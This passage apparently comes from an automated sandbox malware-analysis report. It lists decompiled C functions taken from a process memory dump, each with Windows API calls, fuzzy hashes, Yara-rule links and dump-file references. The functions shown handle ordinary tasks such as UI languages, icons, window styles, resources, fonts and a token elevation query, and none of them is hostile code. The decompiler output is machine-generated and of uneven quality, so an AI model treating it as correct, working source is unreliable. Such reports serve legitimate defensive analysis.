                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                                                            • String ID: \UA$dUA
                                                            • API String ID: 503893064-3864016770
                                                            • Opcode ID: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
                                                            • Instruction ID: 123e0454fb2a9dec89cd9e8203dbd653fcf04e778e7e37e714b9737e464d7bf3
                                                            • Opcode Fuzzy Hash: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
                                                            • Instruction Fuzzy Hash: 8641A370B002599FDB00EFA6C8815EEBBF5AF58314F40812AE914A7382D77D5E05CB6A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040DE74, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E0040DE74(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x6d1c0c()) {
					_v16 = E0040DE30( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x6d1c08(4,  &_v32,  &_v20);
				}
				_t39 = E0040DE30( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E0040B2DC(_t81, _t67);
					_t39 = E00406F28(_t67);
				}
				if(_v16 != 0) {
					 *0x6d1c08(0, 0,  &_v20);
					_t68 = E0040DE30( &_v12);
					if(_v8 != _v12 || E0040DE0C(_v16, _v12, _t68) != 0) {
						 *0x6d1c08(8, _v16,  &_v20);
					}
					E00406F28(_t68);
					return E00406F28(_v16);
				}
				return _t39;
			}





















                                                            0x0040de7c
                                                            0x0040de7e
                                                            0x0040de82
                                                            0x0040de8e
                                                            0x0040de98
                                                            0x0040de9b
                                                            0x0040de9d
                                                            0x0040dea4
                                                            0x0040dea7
                                                            0x0040deb8
                                                            0x0040debe
                                                            0x0040dec1
                                                            0x0040dec4
                                                            0x0040dec7
                                                            0x0040decd
                                                            0x0040ded3
                                                            0x0040dee3
                                                            0x0040dee3
                                                            0x0040deec
                                                            0x0040def1
                                                            0x0040def5
                                                            0x0040defa
                                                            0x0040deff
                                                            0x0040df01
                                                            0x0040df02
                                                            0x0040df09
                                                            0x0040df11
                                                            0x0040df16
                                                            0x0040df16
                                                            0x0040df1c
                                                            0x0040df1f
                                                            0x0040df1f
                                                            0x0040df09
                                                            0x0040df26
                                                            0x0040df2d
                                                            0x0040df2d
                                                            0x0040df36
                                                            0x0040df40
                                                            0x0040df4e
                                                            0x0040df56
                                                            0x0040df73
                                                            0x0040df73
                                                            0x0040df7b
                                                            0x00000000
                                                            0x0040df83
                                                            0x0040df8d

                                                            APIs
                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040DE85
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040DEE3
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040DF40
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040DF73
                                                              • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040DEF1), ref: 0040DE47
                                                              • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040DEF1), ref: 0040DE64
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Thread$LanguagesPreferred$Language
                                                            • String ID:
                                                            • API String ID: 2255706666-0
                                                            • Opcode ID: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                            • Instruction ID: 69b1dabfcf83cd92044bbbe7d095353c7cd2b80021ffbfb9d1b785f1729ac455
                                                            • Opcode Fuzzy Hash: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                            • Instruction Fuzzy Hash: 63317070E1021A9BCB10DFE9D884AAEB7B5FF14305F40417AE516FB2D1D7789A09CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005CE374, Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E005CE374(intOrPtr* __eax, int __ecx, int __edx, int _a4, int _a8) {
				int _v8;
				int _v12;
				int _t31;
				intOrPtr* _t41;
				int _t54;
				int _t55;

				_v8 = __ecx;
				_t54 = __edx;
				_t41 = __eax;
				MulDiv( *(__eax + 0x50), __edx, _v8);
				_v12 = MulDiv( *(_t41 + 0x54), _a8, _a4);
				if(( *(_t41 + 0x61) & 0x00000001) != 0) {
					_t55 =  *(_t41 + 0x58);
				} else {
					_t55 = MulDiv( *(_t41 + 0x58), _t54, _v8);
				}
				if(( *(_t41 + 0x61) & 0x00000002) != 0) {
					_t31 =  *(_t41 + 0x5c);
				} else {
					_t31 = MulDiv( *(_t41 + 0x5c), _a8, _a4);
				}
				return  *((intOrPtr*)( *_t41 + 0xc8))(_t31, _t55);
			}









                                                            0x005ce37d
                                                            0x005ce380
                                                            0x005ce382
                                                            0x005ce38d
                                                            0x005ce3a5
                                                            0x005ce3ac
                                                            0x005ce3c0
                                                            0x005ce3ae
                                                            0x005ce3bc
                                                            0x005ce3bc
                                                            0x005ce3c7
                                                            0x005ce3dc
                                                            0x005ce3c9
                                                            0x005ce3d5
                                                            0x005ce3d5
                                                            0x005ce3f6

                                                            APIs
                                                            • MulDiv.KERNEL32(?,0068D5D0,?), ref: 005CE38D
                                                            • MulDiv.KERNEL32(?,005CE4BF,0068D5D0), ref: 005CE3A0
                                                            • MulDiv.KERNEL32(?,0068D5D0,?), ref: 005CE3B7
                                                            • MulDiv.KERNEL32(?,005CE4BF,0068D5D0), ref: 005CE3D5
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac23038dacf6796b57d110ed30358184083c47a134689276074c101833fe842e
                                                            • Instruction ID: 3e71b6adc286f200af4aaafaaf3a8fca573aba72415269075ac824ff0f327e96
                                                            • Opcode Fuzzy Hash: ac23038dacf6796b57d110ed30358184083c47a134689276074c101833fe842e
                                                            • Instruction Fuzzy Hash: B9113072A04244AFCB44DEDDD8C5E9F7BEDEF48364B144499F908DB242C678ED808BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004F53AC, Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E004F53AC(intOrPtr* __eax, struct HICON__* __edx, void* __eflags) {
				intOrPtr* _v8;
				struct _ICONINFO _v28;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v52;
				intOrPtr _t33;
				intOrPtr _t45;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xffffffd0;
				_v8 = __eax;
				E004F5338(_v8, __edx);
				if(__edx == 0 || GetIconInfo(__edx,  &_v28) == 0) {
					return  *((intOrPtr*)( *_v8 + 0x10))();
				} else {
					_push(_t49);
					_push(0x4f5429);
					_push( *[fs:edx]);
					 *[fs:edx] = _t52;
					if(GetObjectW(_v28.hbmColor, 0x18,  &_v52) != 0) {
						_t33 =  *((intOrPtr*)(_v8 + 0x28));
						 *((intOrPtr*)(_t33 + 0xc)) = _v48;
						 *((intOrPtr*)(_t33 + 0x10)) = _v44;
					}
					_pop(_t45);
					 *[fs:eax] = _t45;
					_push(E004F5430);
					DeleteObject(_v28.hbmMask);
					return DeleteObject(_v28.hbmColor);
				}
			}













                                                            0x004f53ad
                                                            0x004f53af
                                                            0x004f53b5
                                                            0x004f53bf
                                                            0x004f53c6
                                                            0x004f543f
                                                            0x004f53d6
                                                            0x004f53d8
                                                            0x004f53d9
                                                            0x004f53de
                                                            0x004f53e1
                                                            0x004f53f5
                                                            0x004f53fa
                                                            0x004f5400
                                                            0x004f5406
                                                            0x004f5406
                                                            0x004f540b
                                                            0x004f540e
                                                            0x004f5411
                                                            0x004f541a
                                                            0x004f5428
                                                            0x004f5428

                                                            APIs
                                                            • GetIconInfo.USER32(00000000,00000000), ref: 004F53CD
                                                            • GetObjectW.GDI32(0068D5D0,00000018,00000000,00000000,004F5429,?,004C0068), ref: 004F53EE
                                                            • DeleteObject.GDI32(?), ref: 004F541A
                                                            • DeleteObject.GDI32(0068D5D0), ref: 004F5423
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Object$Delete$IconInfo
                                                            • String ID:
                                                            • API String ID: 507670407-0
                                                            • Opcode ID: 939d8cbd648baad16ebc5502745bc899ef72b4fd7c693fad9428492138ac7e12
                                                            • Instruction ID: 4322d414b200eb17045e09ec041732102b9da4c87ad94fc4c4d540c0fc3291bf
                                                            • Opcode Fuzzy Hash: 939d8cbd648baad16ebc5502745bc899ef72b4fd7c693fad9428492138ac7e12
                                                            • Instruction Fuzzy Hash: 2B11A375A00608AFCB04DFA6D981DAEB7F9EF88314B5081AAFE04D3351DB38DE408B54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005B9590, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 93%
                                                            			E005B9590(signed char __eax, intOrPtr _a4) {
				int _t22;
				void* _t23;
				int _t31;
				signed int _t35;
				signed char _t38;
				void* _t43;
				void* _t44;

				_t38 = __eax;
				_t2 = _a4 - 4; // 0xc31852ff
				_t22 = IsWindowVisible( *( *_t2 + 0x188));
				asm("sbb eax, eax");
				_t23 = _t22 + 1;
				_t43 = _t23 -  *0x6cccd4; // 0x0
				if(_t43 == 0) {
					_t44 = _t38 -  *0x6cccd4; // 0x0
					if(_t44 != 0) {
						_t5 = _a4 - 4; // 0xc31852ff
						if( *((char*)( *_t5 + 0xeb)) != 0 &&  *0x6cccd4 == 0) {
							_t8 = _a4 - 4; // 0xc31852ff
							_t35 = GetWindowLongW( *( *_t8 + 0x188), 0xffffffec);
							_t11 = _a4 - 4; // 0xc31852ff
							SetWindowLongW( *( *_t11 + 0x188), 0xffffffec, _t35 | 0x08000000);
						}
						_t16 = _a4 - 4; // 0xc31852ff
						_t31 = SetWindowPos( *( *_t16 + 0x188), 0, 0, 0, 0, 0,  *(0x6cccd6 + (_t38 & 0x000000ff) * 2) & 0x0000ffff);
						 *0x6cccd4 = _t38;
						return _t31;
					}
				}
				return _t23;
			}










                                                            0x005b9594
                                                            0x005b9599
                                                            0x005b95a3
                                                            0x005b95ab
                                                            0x005b95ad
                                                            0x005b95ae
                                                            0x005b95b4
                                                            0x005b95b6
                                                            0x005b95bc
                                                            0x005b95c1
                                                            0x005b95cb
                                                            0x005b95d9
                                                            0x005b95e5
                                                            0x005b95ed
                                                            0x005b95ff
                                                            0x005b95ff
                                                            0x005b961d
                                                            0x005b9627
                                                            0x005b962c
                                                            0x00000000
                                                            0x005b962c
                                                            0x005b95bc
                                                            0x005b9634

                                                            APIs
                                                            • IsWindowVisible.USER32 ref: 005B95A3
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 005B95E5
                                                            • SetWindowLongW.USER32 ref: 005B95FF
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005B96B9,?,?,?,00000000), ref: 005B9627
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$Long$Visible
                                                            • String ID:
                                                            • API String ID: 2967648141-0
                                                            • Opcode ID: c53b897a5a1d9d2e71e6f85843be0105534f78b66b69f438aa9e828b25e0526c
                                                            • Instruction ID: de5a40ccb5800a4cef2b87037ee72a09c9fd5293aebedbf233be07227e7c069f
                                                            • Opcode Fuzzy Hash: c53b897a5a1d9d2e71e6f85843be0105534f78b66b69f438aa9e828b25e0526c
                                                            • Instruction Fuzzy Hash: B31161742851446FDB00DB28D888FFA7FE9AB45324F458191F988CB362CA38ED80CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0046A218, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E0046A218(void* __eax, struct HINSTANCE__* __edx, WCHAR* _a8) {
				WCHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				WCHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceW(__edx, _v8, _a8);
				 *(_t23 + 0x10) = _t29;
				if(_t29 == 0) {
					E0046A178(_t23, _t24, _t29, _t31, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x46a2b4
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				if(_t30 == 0) {
					E0046A178(_t23, _t24, _t30, _t31, _t32);
				}
				_t7 = _t23 + 0x10; // 0x46a2b4
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x469b00
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00469AAC(_t23, _t25, _t18);
			}

















                                                            0x0046a21f
                                                            0x0046a222
                                                            0x0046a224
                                                            0x0046a234
                                                            0x0046a236
                                                            0x0046a23b
                                                            0x0046a23e
                                                            0x0046a243
                                                            0x0046a243
                                                            0x0046a244
                                                            0x0046a24e
                                                            0x0046a250
                                                            0x0046a255
                                                            0x0046a258
                                                            0x0046a25d
                                                            0x0046a25e
                                                            0x0046a268
                                                            0x0046a269
                                                            0x0046a26d
                                                            0x0046a276
                                                            0x0046a281

                                                            APIs
                                                            • FindResourceW.KERNEL32(?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?,?,006AC890), ref: 0046A22F
                                                            • LoadResource.KERNEL32(?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?), ref: 0046A249
                                                            • SizeofResource.KERNEL32(?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000), ref: 0046A263
                                                            • LockResource.KERNEL32(00469B00,00000000,?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000), ref: 0046A26D
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                            • Instruction ID: abb9b97bb193dfeb05d9d82a7f41705a61c143c3b7d9841fcbe573c2d8062a85
                                                            • Opcode Fuzzy Hash: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                            • Instruction Fuzzy Hash: C4F081B36406046F5745EE9DA881DAB77ECEE89364310015FF908D7302EA39DD51477A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00610040, Relevance: 6.0, APIs: 4, Instructions: 48registrywindowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 90%
                                                            			E00610040(void* __eax, void* __ecx, void* __edx) {
				void* _v16;
				int _t13;
				void* _t20;
				void* _t26;
				void* _t27;

				_push(__ecx);
				_t27 = __edx;
				_t26 = __eax;
				if(__ecx == 0) {
					_t20 = 0x80000002;
				} else {
					_t20 = 0x80000001;
				}
				if(E005C7A14(0,  *((intOrPtr*)(0x6ccfc0 + (E005C77E8() & 0x0000007f) * 4)), _t20,  &_v16, 2, 0) == 0) {
					RegDeleteValueW(_v16, E0040B278(_t26));
					RegCloseKey(_v16);
				}
				_t13 = RemoveFontResourceW(E0040B278(_t27));
				if(_t13 != 0) {
					_t13 = SendNotifyMessageW(0xffff, 0x1d, 0, 0);
				}
				return _t13;
			}








                                                            0x00610043
                                                            0x00610044
                                                            0x00610046
                                                            0x0061004a
                                                            0x00610053
                                                            0x0061004c
                                                            0x0061004c
                                                            0x0061004c
                                                            0x0061007b
                                                            0x0061008a
                                                            0x00610093
                                                            0x00610093
                                                            0x006100a0
                                                            0x006100a7
                                                            0x006100b4
                                                            0x006100b4
                                                            0x006100bd

                                                            APIs
                                                            • RegDeleteValueW.ADVAPI32(?,00000000,?,00000002,00000000,?,?,?,?,0062AC8F), ref: 0061008A
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,?,?,0062AC8F), ref: 00610093
                                                            • RemoveFontResourceW.GDI32(00000000), ref: 006100A0
                                                            • SendNotifyMessageW.USER32(0000FFFF,0000001D,00000000,00000000), ref: 006100B4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseDeleteFontMessageNotifyRemoveResourceSendValue
                                                            • String ID:
                                                            • API String ID: 261542597-0
                                                            • Opcode ID: 77a4b43a7585b641cb4056c657f18fe2b74d7f9113a8b954b3ed7bedb6d61676
                                                            • Instruction ID: 1dce9f2b70afa6587215b720e4c7b57155893329b24cac9d33cbe1fd09ddcff8
                                                            • Opcode Fuzzy Hash: 77a4b43a7585b641cb4056c657f18fe2b74d7f9113a8b954b3ed7bedb6d61676
                                                            • Instruction Fuzzy Hash: B2F0C87674430567EA20B6B65C4BFEF128E8FC9745F24492EBA04EB282D668DC814369
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0050E958, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 87%
                                                            			E0050E958(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x6d5648; // 0x0
					if(GlobalFindAtomW(E0040B278(_t5)) !=  *0x6d5642) {
						_t15 = E0050E924(_t12, _t13);
					} else {
						_t15 = GetPropW(_t12,  *0x6d5642 & 0x0000ffff);
					}
				}
				return _t15;
			}







                                                            0x0050e958
                                                            0x0050e95a
                                                            0x0050e95b
                                                            0x0050e95d
                                                            0x0050e961
                                                            0x0050e978
                                                            0x0050e98f
                                                            0x0050e9aa
                                                            0x0050e991
                                                            0x0050e99f
                                                            0x0050e99f
                                                            0x0050e98f
                                                            0x0050e9b1

                                                            APIs
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0050E965
                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005BA39A,?,?,00000000,00000001,005B8697,?,00000000,00000000,00000000,00000000), ref: 0050E96E
                                                            • GlobalFindAtomW.KERNEL32(00000000), ref: 0050E983
                                                            • GetPropW.USER32 ref: 0050E99A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                            • String ID:
                                                            • API String ID: 2582817389-0
                                                            • Opcode ID: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                            • Instruction ID: 299b27e64c01e87a133ce8a54c99347aef86e5c58dac0e1e1101b5cceb09c5b5
                                                            • Opcode Fuzzy Hash: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                            • Instruction Fuzzy Hash: 09F0ECA160511166CB60BBB65C8787F5A8C9FC43907751D2BF841DA192D514CC8142FE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006A5D88, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E006A5D88() {
				long _v8;
				void _v12;
				void* _v16;
				void* _t16;
				HANDLE* _t17;

				_t17 =  &_v12;
				_t16 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8, _t17) != 0) {
					_v12 = 0;
					if(GetTokenInformation(_v16, 0x12,  &_v12, 4,  &_v8) != 0) {
						_t16 = _v16;
					}
					CloseHandle( *_t17);
				}
				return _t16;
			}








